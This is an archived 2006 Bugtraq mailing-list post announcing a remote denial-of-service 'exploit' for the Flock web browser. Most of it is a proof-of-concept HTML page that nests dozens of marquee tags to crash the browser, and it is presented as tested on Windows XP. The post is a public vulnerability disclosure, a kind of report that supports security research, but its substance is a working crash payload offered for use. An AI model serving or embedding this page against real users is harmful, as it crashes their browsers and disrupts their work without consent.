lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060623002707.6429.qmail@securityfocus.com> Date: 23 Jun 2006 00:27:07 -0000 From: co296@....com To: bugtraq@...urityfocus.com Subject: flock d0s exploit remote. beta 1 (v0.7) Credit's to n00b..Round 2 of the marquee tag's bug... ive found a dos in flock web browser and crash's the browser ive provided a proof of concept :P... thnx tested on win xp pro service pack 1.. http://www.flock.com/ <html> <head> <title>flox web browser remote dos exploit by n00b :: http://www.flock.com/ ::..</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body> <p align=center> <font size=+3 color=red> <marquee width=175%> Credit's to n00b..Round {2} of the marquee bug's... </marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> <marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </marquee> </font> </p> </body> </html>